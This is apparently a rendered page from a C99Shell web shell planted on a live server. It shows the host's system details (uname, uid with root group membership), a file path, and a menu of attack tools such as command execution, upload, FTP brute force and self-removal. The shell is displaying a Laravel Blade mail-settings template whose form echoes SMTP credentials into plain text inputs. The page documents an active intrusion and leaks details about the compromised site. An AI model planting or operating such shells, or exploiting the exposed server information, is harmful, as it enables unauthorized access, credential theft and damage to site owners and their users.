!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/resources/views/admin/settings/pages/   drwxr-xr-x
Free 29.31 GB of 117.98 GB (24.84%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     mail.blade.php (8.28 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('admin.settings.setting-layout')
@section('title')
    {{ __('mail_settings') }}
@endsection

@section('website-settings')
    <div class="alert alert-warning mb-3">
        <h5>{{ __('your_application_might_show_an_error_if_you_dont_have_setup_smtp') }}</h5>
        <hr class="my-2">
        <p class="mb-0"> {{ __('setup_smtp_to_send_all_applications_emails_such_as') }}
            <strong>{{ __('forget_password') }}</strong>, <strong>{{ __('user_verification') }}</strong>,
            <strong>{{ __('invoice') }}</strong> & {{ __('many_more') }}. <a class="text-info" href="https://www.gmass.co/smtp-test"
                target="_blank"> {{ __('test_your_smtp_credentials_here') }} </a></p>
    </div>

    <div class="card">
        <div class="card-header">
            <h3 class="card-title" style="line-height: 36px;">{{ __('mail_settings') }}</h3>
        </div>
        <div class="card-body">
            <form action="{{ route('settings.email.update') }}" method="POST">
                @method('PUT')
                @csrf
                <div class="row">
                    <div class="col-6">
                        <div class="mb-3">
                            <x-forms.label name="{{ __('mail_driver') }}" for="driver" />
                            <input disabled type="text" class="form-control @error('driver') is-invalid @enderror"
                                id="driver" value="smtp" name="driver">
                            @error('driver')
                                <span class="invalid-feedback" role="alert">{{ $message }}</span>
                            @enderror
                        </div>
                    </div>
                    <div class="col-6">
                        <div class="mb-3">
                            <x-forms.label name="{{ __('mail_host') }}" />
                            <input type="text" class="form-control @error('mail_host') is-invalid @enderror"
                                id="mail_host" value="{{ config('mail.mailers.smtp.host') }}" name="mail_host">
                            @error('mail_host')
                                <span class="invalid-feedback" role="alert">{{ $message }}</span>
                            @enderror
                        </div>
                    </div>
                    <div class="col-6">
                        <div class="mb-3">
                            <x-forms.label name="{{ __('mail_port') }}" />
                            <input type="number" class="form-control @error('mail_port') is-invalid @enderror"
                                id="mail_port" value="{{ config('mail.mailers.smtp.port') }}" name="mail_port">
                            @error('mail_port')
                                <span class="invalid-feedback" role="alert">{{ $message }}</span>
                            @enderror
                        </div>
                    </div>
                    <div class="col-6">
                        <div class="mb-3">
                            <x-forms.label name="{{ __('mail_username') }}" />
                            <input type="text" class="form-control @error('mail_username') is-invalid @enderror"
                                id="mail_username" placeholder="{{ __('change_mail_username') }}" name="mail_username"
                                value="{{ config('mail.mailers.smtp.username') }}">
                            @error('mail_username')
                                <span class="invalid-feedback" role="alert">{{ $message }}</span>
                            @enderror
                        </div>
                    </div>
                    <div class="col-6">
                        <div class="mb-3">
                            <x-forms.label name="{{ __('mail_password') }}" />
                            <input type="text" class="form-control @error('mail_password') is-invalid @enderror"
                                id="mail_password" placeholder="{{ __('change_mail_password') }}" name="mail_password"
                                value="{{ config('mail.mailers.smtp.password') }}">
                            @error('mail_password')
                                <span class="invalid-feedback" role="alert">{{ $message }}</span>
                            @enderror
                        </div>
                    </div>
                    <div class="col-6">
                        <div class="mb-3">
                            <x-forms.label name="{{ __('mail_encryption') }}" />
                            <select name="mail_encryption" id="mail_encryption"
                                class="form-control @error('mail_encryption') is-invalid @enderror">
                                <option {{ config('mail.mailers.smtp.encryption') == 'tls' ? 'selected' : '' }}
                                    value="tls">TLS</option>
                                <option {{ config('mail.mailers.smtp.encryption') == 'ssl' ? 'selected' : '' }}
                                    value="ssl">SSL</option>
                            </select>
                            @error('mail_encryption')
                                <span class="invalid-feedback" role="alert">{{ $message }}</span>
                            @enderror
                        </div>
                    </div>
                    <div class="col-6">
                        <div class="mb-3">
                            <x-forms.label name="{{ __('mail_from_address') }}" />
                            <input type="email" class="form-control @error('mail_from_address') is-invalid @enderror"
                                id="mail_from_address" value="{{ config('mail.from.address') }}" name="mail_from_address">
                            @error('mail_from_address')
                                <span class="invalid-feedback" role="alert">{{ $message }}</span>
                            @enderror
                        </div>
                    </div>
                    <div class="col-6">
                        <div class="mb-3">
                            <x-forms.label name="{{ __('mail_from_name') }}" />
                            <input type="text" class="form-control @error('mail_from_name') is-invalid @enderror"
                                id="mail_from_name" value="{{ config('mail.from.name') }}" name="mail_from_name">
                            @error('mail_from_name')
                                <span class="invalid-feedback" role="alert">{{ $message }}</span>
                            @enderror
                        </div>
                    </div>
                </div>
                @if (userCan('setting.update'))
                    <div class="mx-auto">
                        <div class="text-center">
                            <button type="submit" class="btn btn-success"><i class="fas fa-sync"></i>
                                {{ __('update') }}</button>
                        </div>
                    </div>
                @endif
            </form>
        </div>
    </div>
    <div class="card mt-3">
        <div class="card-header">
            <h3 class="card-title">{{ __('send_test_mail') }}</h3>
        </div>
        <div class="card-body">
            <div class="d-flex justify-content-center">
                <form class="form-inline" action="{{ route('settings.email.test') }}" method="POST">
                    @csrf
                    <div class="form-group mb-2">
                        <x-forms.label name="{{ __('email_address') }}" for="test_email" />
                    </div>
                    <div class="form-group mx-sm-3 mb-2">
                        <input name="test_email" type="email"
                            class="form-control  @error('test_email') is-invalid @enderror" id="test_email"
                            placeholder="{{ __('enter_email') }}" style="min-width: 400px">
                        @error('test_email')
                            <span class="invalid-feedback" role="alert">{{ $message }}</span>
                        @enderror
                    </div>
                    @if (userCan('setting.update'))
                        <button type="submit" class="btn btn-primary mb-2"><i class="far fa-paper-plane"></i>
                            {{ __('send_mail') }}</button>
                    @endif
                </form>
            </div>
        </div>
    </div>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--